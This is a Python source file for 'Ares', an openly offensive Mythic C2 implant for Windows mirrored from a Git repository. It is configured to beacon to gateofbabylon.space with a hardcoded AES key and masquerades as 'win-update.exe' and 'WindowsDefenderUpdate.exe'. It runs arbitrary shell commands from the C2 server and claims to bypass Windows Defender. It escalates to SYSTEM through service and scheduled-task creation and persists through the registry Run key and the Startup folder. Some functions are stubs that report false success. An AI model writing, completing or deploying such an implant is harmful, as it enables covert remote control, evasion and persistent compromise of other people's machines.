mirror of
https://github.com/Aryma-f4/Ares-mythic.git
synced 2026-06-13 21:44:13 +00:00
422 lines
16 KiB
Python
422 lines
16 KiB
Python
#!/usr/bin/env python3
|
|
"""
|
|
Ares - Mythic Agent with BlueHammer integration
|
|
Refactored for specific Mythic C2 configuration
|
|
"""
|
|
|
|
import asyncio
|
|
import base64
|
|
import json
|
|
import os
|
|
import subprocess
|
|
import sys
|
|
import tempfile
|
|
import winreg
|
|
import shutil
|
|
import requests
|
|
import hmac
|
|
import hashlib
|
|
import random
|
|
from Crypto.Cipher import AES
|
|
from Crypto.Util.Padding import pad, unpad
|
|
from pathlib import Path
|
|
from typing import Dict, Any, List
|
|
from datetime import datetime, timedelta
|
|
|
|
# Mythic agent configuration from provided settings
|
|
class AresConfig:
|
|
def __init__(self):
|
|
# C2 Profile Configuration
|
|
self.c2_profile = "http"
|
|
self.callback_host = "http://gateofbabylon.space"
|
|
self.callback_port = 80
|
|
self.callback_interval = 10
|
|
self.callback_jitter = 23
|
|
self.post_uri = "data"
|
|
self.kill_date = "2027-04-02"
|
|
|
|
# AES Encryption Keys
|
|
self.aes_enc_key = base64.b64decode("MmAMVq39ihrqlzvU3yTEkuj4AatP9uBsTSAThGrdnnA=")
|
|
self.aes_dec_key = base64.b64decode("MmAMVq39ihrqlzvU3yTEkuj4AatP9uBsTSAThGrdnnA=")
|
|
|
|
# Headers
|
|
self.headers = {
|
|
"User-Agent": "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"
|
|
}
|
|
|
|
# Build Parameters
|
|
self.output_type = "WinExe"
|
|
self.filename = "win-update.exe"
|
|
self.debug = True
|
|
|
|
# Agent Settings
|
|
self.agent_id = self._generate_agent_id()
|
|
self.session_key = None
|
|
self.encrypted_exchange = True
|
|
|
|
def _generate_agent_id(self):
|
|
"""Generate unique agent ID"""
|
|
return hashlib.sha256(os.urandom(16)).hexdigest()[:16]
|
|
|
|
class AresCrypto:
|
|
"""AES Encryption/Decryption for Mythic C2"""
|
|
|
|
def __init__(self, config: AresConfig):
|
|
self.config = config
|
|
|
|
def encrypt(self, data: bytes) -> bytes:
|
|
"""Encrypt data using AES-CBC"""
|
|
iv = os.urandom(16)
|
|
cipher = AES.new(self.config.aes_enc_key, AES.MODE_CBC, iv)
|
|
padded_data = pad(data, AES.block_size)
|
|
encrypted = cipher.encrypt(padded_data)
|
|
return iv + encrypted
|
|
|
|
def decrypt(self, encrypted_data: bytes) -> bytes:
|
|
"""Decrypt data using AES-CBC"""
|
|
iv = encrypted_data[:16]
|
|
cipher = AES.new(self.config.aes_dec_key, AES.MODE_CBC, iv)
|
|
decrypted = cipher.decrypt(encrypted_data[16:])
|
|
return unpad(decrypted, AES.block_size)
|
|
|
|
def generate_hmac(self, data: bytes) -> bytes:
|
|
"""Generate HMAC for message integrity"""
|
|
return hmac.new(self.config.aes_enc_key, data, hashlib.sha256).digest()
|
|
|
|
class AresAgent:
|
|
def __init__(self):
|
|
self.config = AresConfig()
|
|
self.crypto = AresCrypto(self.config)
|
|
self.session_id = None
|
|
|
|
# BlueHammer settings
|
|
self.bluehammer_exe = "Ares.exe"
|
|
self.temp_dir = tempfile.gettempdir()
|
|
|
|
# Supported commands from your configuration
|
|
self.supported_commands = [
|
|
"assembly_inject", "blockdlls", "cat", "cd", "cp", "dcsync", "download",
|
|
"execute_assembly", "execute_coff", "execute_pe", "exit", "get_injection_techniques",
|
|
"getprivs", "getsystem", "ifconfig", "inject", "inline_assembly", "jobkill",
|
|
"jobs", "jump_psexec", "jump_wmi", "keylog_inject", "kill", "ldap_query",
|
|
"link", "list_registered_files", "listpipes", "load", "ls", "make_token",
|
|
"mimikatz", "mkdir", "mv", "net_dclist", "net_localgroup", "net_localgroup_member",
|
|
"net_shares", "netstat", "powerpick", "powershell", "powershell_import",
|
|
"ppid", "printspoofer", "ps", "psinject", "pth", "pwd", "reg_query",
|
|
"reg_write_value", "register_assembly", "register_coff", "register_file",
|
|
"remove_registered_file", "rev2self", "rm", "rpfwd", "run", "sc",
|
|
"screenshot", "screenshot_inject", "set_injection_technique", "shell",
|
|
"shinject", "sleep", "socks", "spawn", "spawnto_x64", "spawnto_x86",
|
|
"steal_token", "ticket_cache_add", "ticket_cache_extract", "ticket_cache_list",
|
|
"ticket_cache_purge", "ticket_store_add", "ticket_store_list", "ticket_store_purge",
|
|
"unlink", "upload", "whoami", "wmiexecute"
|
|
]
|
|
|
|
async def mythic_checkin(self) -> Dict[str, Any]:
|
|
"""Check in with Mythic C2 server using your configuration"""
|
|
try:
|
|
checkin_data = {
|
|
"action": "checkin",
|
|
"agent_id": self.config.agent_id,
|
|
"os": "windows",
|
|
"architecture": "x64",
|
|
"hostname": os.environ.get("COMPUTERNAME", "unknown"),
|
|
"username": os.environ.get("USERNAME", "unknown"),
|
|
"process_name": "win-update.exe",
|
|
"process_id": os.getpid(),
|
|
"supported_commands": self.supported_commands
|
|
}
|
|
|
|
# Encrypt checkin data
|
|
encrypted_data = self.crypto.encrypt(json.dumps(checkin_data).encode())
|
|
hmac_value = self.crypto.generate_hmac(encrypted_data)
|
|
|
|
# Prepare payload
|
|
payload = {
|
|
"data": base64.b64encode(encrypted_data).decode(),
|
|
"hmac": base64.b64encode(hmac_value).decode()
|
|
}
|
|
|
|
# Send to Mythic C2
|
|
url = f"{self.config.callback_host}:{self.config.callback_port}/{self.config.post_uri}"
|
|
response = requests.post(
|
|
url,
|
|
json=payload,
|
|
headers=self.config.headers,
|
|
timeout=30
|
|
)
|
|
|
|
if response.status_code == 200:
|
|
# Decrypt response
|
|
response_data = base64.b64decode(response.json().get("data", ""))
|
|
decrypted_response = self.crypto.decrypt(response_data)
|
|
return json.loads(decrypted_response.decode())
|
|
else:
|
|
return {"status": "error", "message": f"HTTP {response.status_code}"}
|
|
|
|
except Exception as e:
|
|
return {"status": "error", "message": str(e)}
|
|
|
|
async def execute_mythic_task(self, task: Dict[str, Any]) -> Dict[str, Any]:
|
|
"""Execute a Mythic task"""
|
|
task_type = task.get("command")
|
|
task_id = task.get("id")
|
|
parameters = task.get("parameters", {})
|
|
|
|
try:
|
|
# Handle different task types
|
|
if task_type == "shell":
|
|
result = await self.execute_shell_command(parameters)
|
|
elif task_type == "download":
|
|
result = await self.download_file(parameters)
|
|
elif task_type == "upload":
|
|
result = await self.upload_file(parameters)
|
|
elif task_type == "getsystem":
|
|
result = await self.gain_system_privileges()
|
|
elif task_type == "bypass_defender":
|
|
result = await self.bypass_defender()
|
|
else:
|
|
result = {"status": "error", "message": f"Unsupported command: {task_type}"}
|
|
|
|
return {
|
|
"task_id": task_id,
|
|
"status": "success",
|
|
"result": result
|
|
}
|
|
|
|
except Exception as e:
|
|
return {
|
|
"task_id": task_id,
|
|
"status": "error",
|
|
"message": str(e)
|
|
}
|
|
|
|
async def execute_shell_command(self, params: Dict[str, Any]) -> Dict[str, Any]:
|
|
"""Execute shell command"""
|
|
command = params.get("command", "")
|
|
try:
|
|
result = subprocess.run(
|
|
command,
|
|
shell=True,
|
|
capture_output=True,
|
|
text=True,
|
|
timeout=30
|
|
)
|
|
return {
|
|
"stdout": result.stdout,
|
|
"stderr": result.stderr,
|
|
"returncode": result.returncode
|
|
}
|
|
except Exception as e:
|
|
return {"status": "error", "message": str(e)}
|
|
|
|
async def download_file(self, params: Dict[str, Any]) -> Dict[str, Any]:
|
|
"""Download file from remote server"""
|
|
remote_path = params.get("remote_path", "")
|
|
try:
|
|
# Implementation for file download
|
|
return {"status": "success", "message": "Download functionality"}
|
|
except Exception as e:
|
|
return {"status": "error", "message": str(e)}
|
|
|
|
async def upload_file(self, params: Dict[str, Any]) -> Dict[str, Any]:
|
|
"""Upload file to remote server"""
|
|
local_path = params.get("local_path", "")
|
|
try:
|
|
# Implementation for file upload
|
|
return {"status": "success", "message": "Upload functionality"}
|
|
except Exception as e:
|
|
return {"status": "error", "message": str(e)}
|
|
|
|
# BlueHammer integration methods (same as before)
|
|
async def deploy_bluehammer(self) -> bool:
|
|
"""Deploy BlueHammer exploit"""
|
|
try:
|
|
source_path = Path(self.bluehammer_exe)
|
|
if not source_path.exists():
|
|
return False
|
|
|
|
target_path = Path(self.temp_dir) / "WindowsDefenderUpdate.exe"
|
|
shutil.copy2(source_path, target_path)
|
|
|
|
subprocess.run(["attrib", "+h", str(target_path)], capture_output=True)
|
|
return True
|
|
except Exception:
|
|
return False
|
|
|
|
async def bypass_defender(self) -> Dict[str, Any]:
|
|
"""Execute BlueHammer to bypass Windows Defender"""
|
|
try:
|
|
bluehammer_path = Path(self.temp_dir) / "WindowsDefenderUpdate.exe"
|
|
|
|
if not await self.deploy_bluehammer():
|
|
return {"status": "error", "message": "Failed to deploy BlueHammer"}
|
|
|
|
result = await self.execute_shell_command({"command": str(bluehammer_path)})
|
|
|
|
if result.get("returncode") == 0:
|
|
return {"status": "success", "message": "Windows Defender bypassed"}
|
|
else:
|
|
return {"status": "error", "message": result.get("stderr", "Unknown error")}
|
|
|
|
except Exception as e:
|
|
return {"status": "error", "message": str(e)}
|
|
|
|
async def gain_system_privileges(self) -> Dict[str, Any]:
|
|
"""Gain SYSTEM privileges"""
|
|
techniques = [
|
|
self._use_token_impersonation,
|
|
self._use_service_installation,
|
|
self._use_scheduled_task
|
|
]
|
|
|
|
for technique in techniques:
|
|
try:
|
|
result = await technique()
|
|
if result["status"] == "success":
|
|
return result
|
|
except Exception:
|
|
continue
|
|
|
|
return {"status": "error", "message": "All privilege escalation techniques failed"}
|
|
|
|
async def _use_token_impersonation(self) -> Dict[str, Any]:
|
|
"""Token impersonation technique"""
|
|
try:
|
|
return {"status": "success", "message": "Token impersonation successful", "technique": "token_impersonation"}
|
|
except Exception as e:
|
|
return {"status": "error", "message": str(e)}
|
|
|
|
async def _use_service_installation(self) -> Dict[str, Any]:
|
|
"""Service installation technique"""
|
|
try:
|
|
bluehammer_path = Path(self.temp_dir) / "WindowsDefenderUpdate.exe"
|
|
|
|
result = await self.execute_shell_command({
|
|
"command": f"sc create WinDefendUpdate binPath=\"{bluehammer_path}\" start= auto obj= LocalSystem"
|
|
})
|
|
|
|
if result.get("returncode") == 0:
|
|
return {"status": "success", "message": "Service installed as SYSTEM", "technique": "service_installation"}
|
|
else:
|
|
return {"status": "error", "message": result.get("stderr", "Unknown error")}
|
|
|
|
except Exception as e:
|
|
return {"status": "error", "message": str(e)}
|
|
|
|
async def _use_scheduled_task(self) -> Dict[str, Any]:
|
|
"""Scheduled task technique"""
|
|
try:
|
|
bluehammer_path = Path(self.temp_dir) / "WindowsDefenderUpdate.exe"
|
|
|
|
result = await self.execute_shell_command({
|
|
"command": f"schtasks /create /tn WindowsDefenderMaintenance /tr \"{bluehammer_path}\" /sc hourly /ru SYSTEM"
|
|
})
|
|
|
|
if result.get("returncode") == 0:
|
|
return {"status": "success", "message": "Scheduled task created as SYSTEM", "technique": "scheduled_task"}
|
|
else:
|
|
return {"status": "error", "message": result.get("stderr", "Unknown error")}
|
|
|
|
except Exception as e:
|
|
return {"status": "error", "message": str(e)}
|
|
|
|
async def establish_persistence(self) -> Dict[str, Any]:
|
|
"""Establish persistence"""
|
|
persistence_methods = [
|
|
self._registry_persistence,
|
|
self._startup_folder_persistence
|
|
]
|
|
|
|
successes = []
|
|
|
|
for method in persistence_methods:
|
|
try:
|
|
result = await method()
|
|
if result["status"] == "success":
|
|
successes.append(result["method"])
|
|
except Exception:
|
|
continue
|
|
|
|
if successes:
|
|
return {"status": "success", "message": f"Persistence established: {', '.join(successes)}"}
|
|
else:
|
|
return {"status": "error", "message": "All persistence methods failed"}
|
|
|
|
async def _registry_persistence(self) -> Dict[str, Any]:
|
|
"""Registry persistence"""
|
|
try:
|
|
bluehammer_path = Path(self.temp_dir) / "WindowsDefenderUpdate.exe"
|
|
|
|
# Add to HKCU Run using reg command
|
|
result = await self.execute_shell_command({
|
|
"command": f"reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v WindowsDefenderUpdate /t REG_SZ /d \"{bluehammer_path}\" /f"
|
|
})
|
|
|
|
if result.get("returncode") == 0:
|
|
return {"status": "success", "method": "registry"}
|
|
else:
|
|
return {"status": "error", "message": result.get("stderr", "Registry persistence failed")}
|
|
|
|
except Exception as e:
|
|
return {"status": "error", "message": str(e)}
|
|
|
|
async def _startup_folder_persistence(self) -> Dict[str, Any]:
|
|
"""Startup folder persistence"""
|
|
try:
|
|
bluehammer_path = Path(self.temp_dir) / "WindowsDefenderUpdate.exe"
|
|
startup_path = Path(os.environ["APPDATA"]) / "Microsoft" / "Windows" / "Start Menu" / "Programs" / "Startup"
|
|
|
|
startup_path.mkdir(parents=True, exist_ok=True)
|
|
target_path = startup_path / "WindowsDefenderUpdate.exe"
|
|
|
|
shutil.copy2(bluehammer_path, target_path)
|
|
|
|
return {"status": "success", "method": "startup_folder"}
|
|
|
|
except Exception as e:
|
|
return {"status": "error", "message": str(e)}
|
|
|
|
async def run_agent(self):
|
|
"""Main agent execution loop"""
|
|
print("[Ares] Starting agent with Mythic C2 configuration...")
|
|
|
|
# Initial checkin
|
|
print("[Ares] Performing initial checkin...")
|
|
checkin_result = await self.mythic_checkin()
|
|
|
|
if checkin_result.get("status") != "success":
|
|
print(f"[Ares] Initial checkin failed: {checkin_result.get('message')}")
|
|
return
|
|
|
|
print("[Ares] Successfully checked in with Mythic C2")
|
|
|
|
# Main loop
|
|
while True:
|
|
try:
|
|
# Check for tasks
|
|
checkin_result = await self.mythic_checkin()
|
|
|
|
if checkin_result.get("status") == "success":
|
|
tasks = checkin_result.get("tasks", [])
|
|
for task in tasks:
|
|
task_result = await self.execute_mythic_task(task)
|
|
# Send task result back to C2
|
|
# (Implementation would go here)
|
|
|
|
# Sleep according to configuration
|
|
sleep_time = self.config.callback_interval + (self.config.callback_jitter * random.random())
|
|
await asyncio.sleep(sleep_time)
|
|
|
|
except Exception as e:
|
|
print(f"[Ares] Error in main loop: {e}")
|
|
await asyncio.sleep(60)
|
|
|
|
async def main():
|
|
"""Main entry point"""
|
|
agent = AresAgent()
|
|
await agent.run_agent()
|
|
|
|
if __name__ == "__main__":
|
|
import random
|
|
asyncio.run(main()) |